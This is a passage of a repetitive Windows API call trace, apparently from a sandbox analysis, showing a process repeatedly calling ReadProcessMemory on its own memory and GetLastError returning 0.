lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400199, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.334] GetLastError () returned 0x0 [0329.334] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001aa, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ab, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ac, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ad, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ae, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001af, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.335] GetLastError () returned 0x0 [0329.335] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ba, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001be, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bf, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ca, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ce, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cf, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.336] GetLastError () returned 0x0 [0329.336] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001da, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001db, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001dc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001dd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001de, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001df, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.337] GetLastError () returned 0x0 [0329.337] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ea, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001eb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ec, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ed, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ee, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ef, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.338] GetLastError () returned 0x0 [0329.338] ReadProcessMemory 